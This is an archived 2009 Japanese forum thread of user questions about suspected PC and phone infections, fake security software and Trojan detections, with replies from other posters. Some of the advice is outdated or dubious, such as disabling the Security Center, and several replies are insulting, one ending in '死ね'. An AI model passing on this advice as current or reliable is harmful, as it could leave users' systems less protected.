この状態だと家族の中でもPCの画面覗くことってできます?
なんか親父が俺のPC覗いてるような気がしてならない(理由は色々とあるんだけども
というか話変わるんだけど
ウィルスバスター2009でほぼ毎日検索かけてるんですが
今PCに元々はいっていたノートンセキュリティーが検索をかけだして
まだ途中なんですが22個のクッキーと2個のウィルスが検出されています
でも今日ウィルスバスターで検索をかけていたのにこの数は多すぎだと思うのですが
これはウィルスバスターが検出できないようなものもノートンが検出したということでしょうか?
516 :名無しさん@お腹いっぱい。:2009/03/04(水) 21:17:49
うん。
517 :名無しさん@お腹いっぱい。:2009/03/04(水) 21:45:04
【使用OS】 「WinXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「なし」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「なし」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「してない」
【ルータの有無】 「有り」
便利ツールインスコしてたりしてて次回立ち上げるとマウスのポインタしか映らなかったり
映ってもしばらくするとブルスク
以前まで出来てたオンラインスキャンも文字なしのエラーが出て???状態なったからOSインスコ
そろそろウィルス対策ソフトいれようかなぁと思ってるけど、今回のはスペック不足?
こういうウィルスってあるんですかね
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「なし」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「なし」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「してない」
【ルータの有無】 「有り」
便利ツールインスコしてたりしてて次回立ち上げるとマウスのポインタしか映らなかったり
映ってもしばらくするとブルスク
以前まで出来てたオンラインスキャンも文字なしのエラーが出て???状態なったからOSインスコ
そろそろウィルス対策ソフトいれようかなぁと思ってるけど、今回のはスペック不足?
こういうウィルスってあるんですかね
518 :名無しさん@お腹いっぱい。:2009/03/04(水) 22:01:42
519 :名無しさん@お腹いっぱい。:2009/03/04(水) 22:07:47
520 :名無しさん@お腹いっぱい。:2009/03/04(水) 23:05:24
>>519
どっちかアンインスコしたほうがいいぞ
どっちかアンインスコしたほうがいいぞ
521 :名無しさん@お腹いっぱい。:2009/03/04(水) 23:23:54
ノートン消しますた^p^
522 :名無しさん@お腹いっぱい。:2009/03/04(水) 23:24:42
むしろバスター消せよ
523 :名無しさん@お腹いっぱい。:2009/03/04(水) 23:25:03
だなw
524 :名無しさん@お腹いっぱい。:2009/03/05(木) 06:04:33
携帯にウィルスかハッカー入り込む事ってありますか?
525 :名無しさん@お腹いっぱい。:2009/03/05(木) 06:12:28
携帯でネットしてたら変な漢字がズラリと並んだページが出てきた。上の方はまともな文字が並んでたが途中から変な漢字が並んで出てきた。これってウィルス?
526 :名無しさん@お腹いっぱい。:2009/03/05(木) 09:49:21
先日、あるサイトを開いたら、凄い勢いで感染しただの、危険だの、といった英文が出てきました。
HIGH、LOW、などといったランク付けされた検出結果みたいな画面とともに、すぐに駆除しないと危険ですとコメントがでます。
OKすると、アンチウィルスPROの購入を勧める画面になって、それらの画面が消せません。
再起動すると、デスクトップ右下のタグの赤い盾みたいな?セキュリティー関連のやつ?が何だか主張していて、
それをクリックすると同じように前述したような画面が出てきます。
何かに感染しているとは思うのですが全くの初心者なので対処が分かりません。
OSはVISTAでセキュリティーソフトは入れていません。
パソコンを買った時に、初期設定してくれた店の人が、VISTAはセキュリティーソフトが内蔵されているので、そういったソフトは入れないで下さいと言われていたので。
長くなってしまいすいません。誰か助けて下さい。
HIGH、LOW、などといったランク付けされた検出結果みたいな画面とともに、すぐに駆除しないと危険ですとコメントがでます。
OKすると、アンチウィルスPROの購入を勧める画面になって、それらの画面が消せません。
再起動すると、デスクトップ右下のタグの赤い盾みたいな?セキュリティー関連のやつ?が何だか主張していて、
それをクリックすると同じように前述したような画面が出てきます。
何かに感染しているとは思うのですが全くの初心者なので対処が分かりません。
OSはVISTAでセキュリティーソフトは入れていません。
パソコンを買った時に、初期設定してくれた店の人が、VISTAはセキュリティーソフトが内蔵されているので、そういったソフトは入れないで下さいと言われていたので。
長くなってしまいすいません。誰か助けて下さい。
527 :名無しさん@お腹いっぱい。:2009/03/05(木) 10:05:34
流行の偽セキュリティソフトの類だな。
とりあえずリカバリ。
終わったら、近くの家電量販店で「ノートンインターネットセキュリティ」ってのを買ってこい。
>VISTAはセキュリティーソフトが内蔵されているので、そういったソフトは入れないで下さい
Vista付属のははっきり言ってお守りレベル。
コントロールパネルの方から無効にできるから、早々に別のセキュリティソフト導入を勧める。
とりあえずリカバリ。
終わったら、近くの家電量販店で「ノートンインターネットセキュリティ」ってのを買ってこい。
>VISTAはセキュリティーソフトが内蔵されているので、そういったソフトは入れないで下さい
Vista付属のははっきり言ってお守りレベル。
コントロールパネルの方から無効にできるから、早々に別のセキュリティソフト導入を勧める。
528 :名無しさん@お腹いっぱい。:2009/03/05(木) 10:06:04
祈りなさい。祈るのです!
529 :名無しさん@お腹いっぱい。:2009/03/05(木) 10:08:40
店の人ひどいね
530 :名無しさん@お腹いっぱい。:2009/03/05(木) 10:36:53
>>525
文字コードがおかしいとかじゃないの
文字コードがおかしいとかじゃないの
531 :名無しさん@お腹いっぱい。:2009/03/05(木) 12:55:15
532 :名無しさん@お腹いっぱい。:2009/03/05(木) 13:06:34
>>526です。
職場の人に聞いたら、スパイボット?ってのが無料でダウンロード出来るから、
それで駆除してみて、それでもまだおかしいようだったら初期化した方がいいよと言われました。
どっちがいいですかね?
そのスパイボットっていうのを試してみる価値があるなら、まずは試してみようかなと思うのですが。
ほんとにパソコン音痴なもので、初期化するにもサービス業者に委託で頼まないと出来ないから、
出来たら初期化しない方向でいきたいんですけど…。
そのスパイボット使って自分で駆除するのが難しそうなら諦めて初期化します。
職場の人に聞いたら、スパイボット?ってのが無料でダウンロード出来るから、
それで駆除してみて、それでもまだおかしいようだったら初期化した方がいいよと言われました。
どっちがいいですかね?
そのスパイボットっていうのを試してみる価値があるなら、まずは試してみようかなと思うのですが。
ほんとにパソコン音痴なもので、初期化するにもサービス業者に委託で頼まないと出来ないから、
出来たら初期化しない方向でいきたいんですけど…。
そのスパイボット使って自分で駆除するのが難しそうなら諦めて初期化します。
533 :名無しさん@お腹いっぱい。:2009/03/05(木) 13:24:49
534 :名無しさん@お腹いっぱい。:2009/03/05(木) 13:39:44
>>532
Spybotだけではとうてい無理。正規のセキュリティソフト入れてないんだろ?
AntiVirusPro - 駆除方法
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2007-100119-4941-99&tabid=3
↓これだけやってもどうかという所だと思うよ。
http://pc11.2ch.net/test/read.cgi/sec/1231490187/146
Spybotだけではとうてい無理。正規のセキュリティソフト入れてないんだろ?
AntiVirusPro - 駆除方法
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2007-100119-4941-99&tabid=3
↓これだけやってもどうかという所だと思うよ。
http://pc11.2ch.net/test/read.cgi/sec/1231490187/146
535 :名無しさん@お腹いっぱい。:2009/03/05(木) 15:39:41
>>533
>>534
すいません。全く未知の事なんで、ある程度情報収集してからじゃないと怖くないですか?
パソコンなんて安い物でもないですし…。下手な事はしない方がいいと思って色々聞いてしまいました。
spybotだけでは駄目そうなので、みなさんの言うように初期化しようかと思います。
ありがとうございました。
>>534
すいません。全く未知の事なんで、ある程度情報収集してからじゃないと怖くないですか?
パソコンなんて安い物でもないですし…。下手な事はしない方がいいと思って色々聞いてしまいました。
spybotだけでは駄目そうなので、みなさんの言うように初期化しようかと思います。
ありがとうございました。
536 :名無しさん@お腹いっぱい。:2009/03/05(木) 17:21:13
>>530 いえ違うと思う・・何故ならPCに以前入ったやつと同じだから。それもウィルス又はハッカーだったのでPC作動中に誤作動ばかり起こしてた。変な漢字といっても漢字辞典に載ってないような奇妙なやつなんだよね・・・
537 :名無しさん@お腹いっぱい。:2009/03/06(金) 00:14:43
538 :名無しさん@お腹いっぱい。:2009/03/06(金) 02:48:18
>>536です PC版のとあるHPを携帯から見ててそのHPにあるメアドに返信したのを機におかしくなったのでそのメアド(HP)がウィルスに感染しててこっちに感染したのでは・・と思っている。
539 :名無しさん@お腹いっぱい。:2009/03/06(金) 03:15:33
>>536です。>>538の続き こういった経験ある人いませんか?少なくとも文字ばけ等では絶対ない。自分のPCに現れたのと同じものなので。例えば次の様な形で出てくる→「娜禽胤○タィ繼覩ァ○贓臧黐ラュ齲」
540 :名無しさん@お腹いっぱい。:2009/03/06(金) 03:45:19
【使用OS】 「WindowsXP SP2」
【Microsoft Update(MU)の状態】 「SP3ではないが他のプログラムは更新済み」
【使用セキュリティソフトとバージョン】 「ESET Smart Security 定義ファイルバージョン3911 」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「SpyBot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「いいえ」
【ルータの有無】 「あり」
【スキャンの結果】 「検出されず」
spybotにて突然レジストリ変更の警告が出ました
「wextract_cleanup0」を変更するかどうかという警告で、調べてみるとウィルスの可能性があるようです
NOD32で検索かけても何も検出しません
ためしに他社のオンラインスキャンをかけてみたのですがそれでも検出なし(カスペOSは何故かDB更新で止まるので不可でした)
警告出現時に閲覧していたサイトは「ふたばちゃんねる」と「FF9攻略」の2つ
実行していたアプリケーションはSleipnirとギコナビのみです
全く身に覚えのない変更な上、怪しいアドレス等を踏んだ覚えもなく焦っています
これは誤検出なのでしょうか?
*ログ
現在のファイル名: rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\WINDOWS\TEMP\IXP000.TMP\"
データベースの状態: 典型的な該当は無し
値: wextract_cleanup0
ファイル名: advpack.dll, DelNodeRunDLL32 [path] [filename].TMP
記述
Wextract Cleanup0 is valid and legal software included or sold to help clean up temporary or cab files created by the installer software for a wide variety of software. It should disapear after a restart of the system. If not fix it
ソース: Paul Collins Startup list
____________________
*ログここまで
【Microsoft Update(MU)の状態】 「SP3ではないが他のプログラムは更新済み」
【使用セキュリティソフトとバージョン】 「ESET Smart Security 定義ファイルバージョン3911 」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「SpyBot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「いいえ」
【ルータの有無】 「あり」
【スキャンの結果】 「検出されず」
spybotにて突然レジストリ変更の警告が出ました
「wextract_cleanup0」を変更するかどうかという警告で、調べてみるとウィルスの可能性があるようです
NOD32で検索かけても何も検出しません
ためしに他社のオンラインスキャンをかけてみたのですがそれでも検出なし(カスペOSは何故かDB更新で止まるので不可でした)
警告出現時に閲覧していたサイトは「ふたばちゃんねる」と「FF9攻略」の2つ
実行していたアプリケーションはSleipnirとギコナビのみです
全く身に覚えのない変更な上、怪しいアドレス等を踏んだ覚えもなく焦っています
これは誤検出なのでしょうか?
*ログ
現在のファイル名: rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\WINDOWS\TEMP\IXP000.TMP\"
データベースの状態: 典型的な該当は無し
値: wextract_cleanup0
ファイル名: advpack.dll, DelNodeRunDLL32 [path] [filename].TMP
記述
Wextract Cleanup0 is valid and legal software included or sold to help clean up temporary or cab files created by the installer software for a wide variety of software. It should disapear after a restart of the system. If not fix it
ソース: Paul Collins Startup list
____________________
*ログここまで
541 :名無しさん@お腹いっぱい。:2009/03/06(金) 03:56:49
>>536(524、525)です。 >>525で説明してた変な漢字の事ですが調べ直したら漢字辞典に載ってるのもありました。ただ日常使わない難しい漢字が結構入っててカタカナが混じってたりしてどうしていいか分からない
542 :名無しさん@お腹いっぱい。:2009/03/06(金) 04:24:19
>>541
閲覧していたページの文字コードが間違ってるだけじゃないの?
文字化けしたら変な漢字が出てくるのは当たり前だし、もしかしたら携帯には非対応のページかもよ。
何でもかんでもウイルスと騒ぐ前に文字化けは文字コードについてググれ。
閲覧していたページの文字コードが間違ってるだけじゃないの?
文字化けしたら変な漢字が出てくるのは当たり前だし、もしかしたら携帯には非対応のページかもよ。
何でもかんでもウイルスと騒ぐ前に文字化けは文字コードについてググれ。
543 :名無しさん@お腹いっぱい。:2009/03/06(金) 07:02:38
>>542 ハイ、ハイ わかりましたよw
544 :名無しさん@お腹いっぱい。:2009/03/06(金) 07:41:12
普通にPC専用サイトとかを携帯で開こうとしたらそうなるっつうの
いい加減うざい
いい加減うざい
545 :名無しさん@お腹いっぱい。:2009/03/06(金) 08:40:56
プッww 釣れてやんの ガキ
546 :名無しさん@お腹いっぱい。:2009/03/06(金) 10:34:18
頭悪いやつが沸いたようだな
ウィルスバスターの公式サイト携帯でみれば分かるぞ
ウィルスバスターの公式サイト携帯でみれば分かるぞ
547 :名無しさん@お腹いっぱい。:2009/03/06(金) 10:36:40
悪い普通に見えたわ
548 :名無しさん@お腹いっぱい。:2009/03/06(金) 21:06:59
【使用OS】 「Mac OS10.5」にWinXPが乗ってます
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「Macはノートン winはマカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「不明」
【スパイウェア対策ソフト】 「多分上記のみ」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「不明」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「不明」
知り合いなのですが、Macの動作がおかしくなったとかで、HDDを物理フォーマットし
OSも入れ直したそうです。
おかしくなる頃に変なメールが来ていたそうですが、おかしくなったMacとは別のMacで
そのメールを開いて見たそうです。
物理フォーマットしOS入れたあともノートンが「ウイルスオフセットパス」を検出したとかで
そのファイルは除去したそうですが、その後ノートンが
インターネットへのFinderアクセスを遮断しました
アプリケーションの遮断 着信
/System/Library/CoreServices/Finder.app/Contets/MacOS/Finder
ユーザー 501
と2回ずつ6分おきに外部着信、と言うそうです。
どうしたらいいかもう毎日トラブルの質問でこっちも参っています
Macなんて触ったこともありません。知り合いは長年Macを使っているくせに何もわかっていません
これはいったい何なのか、どうしたらよいのか、どなたかお助け願います。
【Microsoft Update(MU)の状態】 「不明」
【使用セキュリティソフトとバージョン】 「Macはノートン winはマカフィー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「不明」
【スパイウェア対策ソフト】 「多分上記のみ」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「不明」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「不明」
知り合いなのですが、Macの動作がおかしくなったとかで、HDDを物理フォーマットし
OSも入れ直したそうです。
おかしくなる頃に変なメールが来ていたそうですが、おかしくなったMacとは別のMacで
そのメールを開いて見たそうです。
物理フォーマットしOS入れたあともノートンが「ウイルスオフセットパス」を検出したとかで
そのファイルは除去したそうですが、その後ノートンが
インターネットへのFinderアクセスを遮断しました
アプリケーションの遮断 着信
/System/Library/CoreServices/Finder.app/Contets/MacOS/Finder
ユーザー 501
と2回ずつ6分おきに外部着信、と言うそうです。
どうしたらいいかもう毎日トラブルの質問でこっちも参っています
Macなんて触ったこともありません。知り合いは長年Macを使っているくせに何もわかっていません
これはいったい何なのか、どうしたらよいのか、どなたかお助け願います。
549 :名無しさん@お腹いっぱい。:2009/03/06(金) 23:59:01
>546 悪いだと?お前、それ誰にいってんの?あ〜ぁ、お前自身の事か。 納得
550 :名無しさん@お腹いっぱい。:2009/03/07(土) 00:13:30
>546 悪いだと?お前、それ誰にいってんの?あ〜ぁお前自身の事か。 納得
551 :名無しさん@お腹いっぱい。:2009/03/07(土) 02:47:46
IEが自動で大量に開いて特定のサイトにアクセスしようとする
その後、エラーの警告文でこう表示される
「不明なソフトウェア例外(0xe0bd7363)がアプリケーション0x7e812a5b」
素人なりにIEごと消そうと、ゴミ箱⇒ディスククリーンしたけどまだ治まらない
知恵を貸してください
OSはXP、ウィルス対策に入れてるノートンでは感知されませんでした
その後、エラーの警告文でこう表示される
「不明なソフトウェア例外(0xe0bd7363)がアプリケーション0x7e812a5b」
素人なりにIEごと消そうと、ゴミ箱⇒ディスククリーンしたけどまだ治まらない
知恵を貸してください
OSはXP、ウィルス対策に入れてるノートンでは感知されませんでした
552 :名無しさん@お腹いっぱい。:2009/03/07(土) 08:38:53
/ ̄ ̄ ̄ / /''7 ./''7 / ̄/ /''7
./ ./ ̄/ / /__/ / / ____  ̄ / /
'ー' _/ / ___ノ / /____/ ___ノ /
/___ノ /____,./ /____,./
_ノ ̄/ / ̄/ /''7 / ̄ ̄ ̄/ / ̄/ /'''7'''7
/ ̄ /  ̄ / /  ̄ フ ./ / ゙ー-; ____ / / /._
 ̄/ / ___ノ / __/ (___ / /ー--'゙ /____/ _ノ /i i/ ./
/__/ /____,./ /___,.ノゝ_/ /_/ /__,/ ゝ、__/
553 :名無しさん@お腹いっぱい。:2009/03/07(土) 11:04:19
554 :名無しさん@お腹いっぱい。:2009/03/07(土) 17:08:11
とりあえずセキュリティセンターを、無効にしてみたら???
555 :名無しさん@お腹いっぱい。:2009/03/08(日) 03:08:35
556 :名無しさん@お腹いっぱい。:2009/03/08(日) 15:26:16
ビヘイビアブロッキングとか挙動を監視する技術あるけど、それがあれば重要な
ファイルとか削除する前に警告がでるの?
ウィルスそれをかいくぐってできることって何があるの?
ファイルとか削除する前に警告がでるの?
ウィルスそれをかいくぐってできることって何があるの?
ごめん、解決した
558 :名無しさん@お腹いっぱい。:2009/03/14(土) 11:47:30
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
【使用OS】 『XP sp3』
【使用ブラウザ】 『IE7』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『Norton Internet Security』
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ケーブルでモデムのみ使用』
NORTONでシステムの完全スキャンをしたところ、「Backdoor.Trojanをウイルススキャナが検出しました」
とでました。
で、
状態:削除しました
推奨する処理:解決しました-処理なし
となっています。
これはもう問題は完全に解決したと考えてよいのでしょうか?
クリーンインストールなどは不要でしょうか。
ちなみに
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2001-062614-1754-99&tabid=3
の駆除方法に従ってなんらかの作業してみようとしましたが、
「4. レジストリから値を削除する」
の段階で指定されているサブキーが見つかりません。
どなたかご教示いただければ幸いです
【使用OS】 『XP sp3』
【使用ブラウザ】 『IE7』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】 『Norton Internet Security』
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ケーブルでモデムのみ使用』
NORTONでシステムの完全スキャンをしたところ、「Backdoor.Trojanをウイルススキャナが検出しました」
とでました。
で、
状態:削除しました
推奨する処理:解決しました-処理なし
となっています。
これはもう問題は完全に解決したと考えてよいのでしょうか?
クリーンインストールなどは不要でしょうか。
ちなみに
http://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2001-062614-1754-99&tabid=3
の駆除方法に従ってなんらかの作業してみようとしましたが、
「4. レジストリから値を削除する」
の段階で指定されているサブキーが見つかりません。
どなたかご教示いただければ幸いです
559 :名無しさん@お腹いっぱい。:2009/03/14(土) 12:01:58
560 :名無しさん@お腹いっぱい。:2009/03/14(土) 12:16:17
561 :名無しさん@お腹いっぱい。:2009/03/14(土) 12:29:05
>>560
マルチポストでぐぐれ
マルチポストでぐぐれ
562 :名無しさん@お腹いっぱい。:2009/03/14(土) 12:32:35
マルチポストが駄目な理由もわからんようなのが2cすんなよ。
563 :名無しさん@お腹いっぱい。:2009/03/14(土) 13:28:41
カスどもが利用されるのは当たり前だろ
564 :名無しさん@お腹いっぱい。:2009/03/14(土) 13:56:44
そりゃ当たり前だな
こいつらは利用されてなんぼ
こいつらは利用されてなんぼ
565 :名無しさん@お腹いっぱい。:2009/03/14(土) 14:02:27
その利用されて何ぼの奴からも拒否されるってのも大概だけどなw
566 :名無しさん@お腹いっぱい。:2009/03/15(日) 11:29:32
昨日1rkの■5MBにも載っているロダで、元ファイル名***.jpg、
ロダのファイル名********.jpgをクリックしたら、エロサイトにつながって
ノートン先生が反応したのだが、これって何?
ロダのファイル名********.jpgをクリックしたら、エロサイトにつながって
ノートン先生が反応したのだが、これって何?
567 :名無しさん@お腹いっぱい。:2009/03/15(日) 11:59:10
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
【使用OS】 『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: 1.6GHz 、メモリ: 756MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】 『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ADSL』 例、光回線でルータ使用中
『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが
【使用OS】 『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: 1.6GHz 、メモリ: 756MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】 『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ADSL』 例、光回線でルータ使用中
『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが
568 :名無しさん@お腹いっぱい。:2009/03/15(日) 12:03:33
それもう秋田
569 :名無しさん@お腹いっぱい。:2009/03/15(日) 13:23:07
そういわずに答えろよ
571 :名無しさん@お腹いっぱい。:2009/03/15(日) 15:11:39
Firefoxのアドオンと何かを入れてたフォルダが突然消えたわけだが
Avastインスコ済み
Avastインスコ済み
572 :名無しさん@お腹いっぱい。:2009/03/15(日) 15:26:04
そうですか、それは大変ですね
573 :名無しさん@お腹いっぱい。:2009/03/15(日) 15:30:24
そうですか、それは大変なんですよ
574 :名無しさん@お腹いっぱい。:2009/03/15(日) 15:42:55
ご愁傷様です。
次
次
575 :名無しさん@お腹いっぱい。:2009/03/15(日) 15:44:15
>>574
ご冥福のAAが貼られるかと期待したのに
ご冥福のAAが貼られるかと期待したのに
576 :名無しさん@お腹いっぱい。:2009/03/15(日) 16:07:13
>>567
これで漏れたやつはいるのかねぇ
これで漏れたやつはいるのかねぇ
577 :名無しさん@お腹いっぱい。:2009/03/15(日) 16:16:35
板違い
578 :名無しさん@お腹いっぱい。:2009/03/15(日) 19:18:07
>>577
失せろカス
失せろカス
579 :名無しさん@お腹いっぱい。:2009/03/16(月) 20:46:09
【使用OS】 「WindowsXP SP2」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【ルータの有無】 「有り」
Setup.exeが入ったAutorun付きのISOファイルを実行してしまいました。Setup.exeをオンライン検索かけたら
http://www.virustotal.com/analisis/948191a9015bfdee7d25a54ebae84440
の結果になったのですが、これはどういったウィルスでしょうか?
Setup.exeをウィルスバスターで検索かけてもウィルスは検出されませんでした。
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「ウィルスバスター2009」
【ルータの有無】 「有り」
Setup.exeが入ったAutorun付きのISOファイルを実行してしまいました。Setup.exeをオンライン検索かけたら
http://www.virustotal.com/analisis/948191a9015bfdee7d25a54ebae84440
の結果になったのですが、これはどういったウィルスでしょうか?
Setup.exeをウィルスバスターで検索かけてもウィルスは検出されませんでした。
580 :名無しさん@お腹いっぱい。:2009/03/16(月) 20:50:41
そのISOはどこで落としたのかな?
581 :名無しさん@お腹いっぱい。:2009/03/16(月) 21:39:26
582 :名無しさん@お腹いっぱい。:2009/03/16(月) 22:48:02
やっぱりか。
板違いだから帰れ。
板違いだから帰れ。
583 :名無しさん@お腹いっぱい。:2009/03/17(火) 20:59:20
お前が消えろ 死ね
584 :名無しさん@お腹いっぱい。:2009/03/18(水) 10:09:05
【使用OS】 「vista」
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「avast最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybotとスパイブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
スタートメニューに急に「elo114.exe」というメニューが出現してびっくりしています。
ウィルスかスパイウェアでしょうか?
間違えてダブルクリックしてしまったのですが何も起こりません。
【Microsoft Update(MU)の状態】 「自動更新」
【使用セキュリティソフトとバージョン】 「avast最新」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「spybotとスパイブラスター」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
スタートメニューに急に「elo114.exe」というメニューが出現してびっくりしています。
ウィルスかスパイウェアでしょうか?
間違えてダブルクリックしてしまったのですが何も起こりません。
585 :名無しさん@お腹いっぱい。:2009/03/18(水) 10:24:44
最近、ExpListOutっていうソフト使わなかった?
586 :名無しさん@お腹いっぱい。:2009/03/18(水) 10:33:55
587 :名無しさん@お腹いっぱい。:2009/03/18(水) 10:50:45
単にVistaの、最近使用したプログラムを簡単に実行できるようにするための機能だから問題ないし
もう使わないのであれば右クリックから消せる。
もう使わないのであれば右クリックから消せる。
588 :名無しさん@お腹いっぱい。:2009/03/18(水) 11:02:17
589 :名無しさん@お腹いっぱい。:2009/03/18(水) 11:17:32
imac+xp sp3の環境です。
「rxicjjvn.dll」というdllが感染しているとの警告を受けたのですが
もう一台のxp sp3(PC機)にはこのような名前のdllは存在しません。
bootcamp特有のdllなのか、それともただのウィルスなのか判断できません。
皆さんのwindows\system32にもこのようなファイルがありますか?
削除しても大丈夫なのでしょうか?
GGっても出てこないので質問させて頂きました。
宜しくお願いします。
「rxicjjvn.dll」というdllが感染しているとの警告を受けたのですが
もう一台のxp sp3(PC機)にはこのような名前のdllは存在しません。
bootcamp特有のdllなのか、それともただのウィルスなのか判断できません。
皆さんのwindows\system32にもこのようなファイルがありますか?
削除しても大丈夫なのでしょうか?
GGっても出てこないので質問させて頂きました。
宜しくお願いします。
590 : ◆N9P3SuvBPo :2009/03/19(木) 16:46:08
>589
レス遅れた、すまない。
PC2台所有してるのですね。
macとXPのデュアルブート環境で、「rxicjjvn.dll」というファイルが感染してるんですね。
どうみてもこんなランダムな名前のファイル、通常は存在しない。
ウイルス名は分からないの?
レス遅れた、すまない。
PC2台所有してるのですね。
macとXPのデュアルブート環境で、「rxicjjvn.dll」というファイルが感染してるんですね。
どうみてもこんなランダムな名前のファイル、通常は存在しない。
ウイルス名は分からないの?
>>590さん
お世話になります。
kaspersky&symantecのonlinescanではtrojan clickerって診断されているのですが
悪意のあるソフトウェアの削除ツール&bitdefenderでは反応なしです。
恐らくウィルスであることは間違いないと思うのですが
削除してしまっても問題ないのかが気になります。
unlocker1.8.7で該dllのwinlogon.exeでの使用(?)は切れたのですが
explorer.exeでの使用(?)を切るとwindows\system32フォルダがフリーズしてしまいます。
590さんの環境下で存在しないdllの様なので、削除しても、os自体が立ち上がらないような
重要なものではなさそうですね。
削除して、少し様子を見てみます。
お気遣い頂き有難う御座いました。
お世話になります。
kaspersky&symantecのonlinescanではtrojan clickerって診断されているのですが
悪意のあるソフトウェアの削除ツール&bitdefenderでは反応なしです。
恐らくウィルスであることは間違いないと思うのですが
削除してしまっても問題ないのかが気になります。
unlocker1.8.7で該dllのwinlogon.exeでの使用(?)は切れたのですが
explorer.exeでの使用(?)を切るとwindows\system32フォルダがフリーズしてしまいます。
590さんの環境下で存在しないdllの様なので、削除しても、os自体が立ち上がらないような
重要なものではなさそうですね。
削除して、少し様子を見てみます。
お気遣い頂き有難う御座いました。
592 : ◆N9P3SuvBPo :2009/03/20(金) 07:23:40
>591
補足しておくと、ファイルのプロパティというのを見れば
正規のファイルか、悪意のあるファイルかは区別が付きます。
補足しておくと、ファイルのプロパティというのを見れば
正規のファイルか、悪意のあるファイルかは区別が付きます。
593 :名無しさん@お腹いっぱい。:2009/03/20(金) 15:58:59
━ 質問用テンプレート ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
【使用OS】 『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
【PCスペック】 『CPU: 1.6GHz 、メモリ: 756MB』 (「システムのプロパティ」参照)
【使用ブラウザ】 『IE6』 例、Firefox 3
【Microsoft Updateの更新の状態】 『自動更新』 例、自動更新設定
【セキュリティソフトと年式】 『バスター2009』 例、○○○○ 2009
【その他スパイウェア対策ソフト】 『なし』
【回線の種類・ルータの有無】 『ADSL』 例、光回線でルータ使用中
『質問』
今は猛省してやってないのですが、winnyってあるじゃないですか。
あれを少しやってた時期がありましたが、CPU切り替え機を使用してやってました。
この場合危険性はあるのでしょうか?つまり2台パソコンがあり専用PCも用意されている状態です。
この状態で暴露ウイルスなどに感染しても個人情報はもれるんでしょうか?
ていうか、これで漏れたら誰でも漏らしてると思うんですが
【使用OS】 『XPSP3』 例、Vista sp1 (「システムのプロパティ」参照)
